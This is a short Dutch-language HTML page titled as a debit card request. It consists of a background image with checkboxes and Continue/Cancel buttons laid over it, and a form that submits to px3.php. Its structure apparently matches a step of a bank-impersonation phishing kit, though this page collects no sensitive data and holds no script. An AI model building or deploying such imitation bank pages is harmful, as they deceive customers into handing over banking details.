<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"><title>Aanvraag betaalpas</title>

<link rel="shortcut icon" href="fav1.ico">
<link rel="icon" type="image/x-icon" href="fav1.ico">
<style type="text/css">
body {
text-decoration: none;
font-family: Arial,Helvetica,sans-serif;
background-repeat: no-repeat;
background-position: left top;
background-image: url(Xackground-3.png);
}
input.P1 {
position: absolute;
top: 430px;
left: 282px;
}
input.P2 {
position: absolute;
top: 488px;
left: 282px;
}
input.P3 {
position: absolute;
top: 546px;
left: 282px;
}
input.P4 {
position: absolute;
top: 585px;
left: 282px;
font-family: Arial,Helvetica,sans-serif;
font-weight: bold;
color: #000066;
}
input.P5 {
position: absolute;
top: 585px;
left: 369px;
font-family: Arial,Helvetica,sans-serif;
color: #000066;
}
</style>
</head>
<body>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<form method="get" action="px3.php" name="form">
<input style="top: 427px; left: 288px;" checked="checked" class="P1" tabindex="1" name="P1" value="ON" type="checkbox">&nbsp;
<input style="top: 492px; left: 287px;" class="P2" tabindex="2" name="P2" value="ON" type="checkbox"><input name="P4" class="P4" value="Doorgaan" type="submit"><input class="P5" name="P5" value="Annuleren" type="reset"><br>
</form>
</body></html>
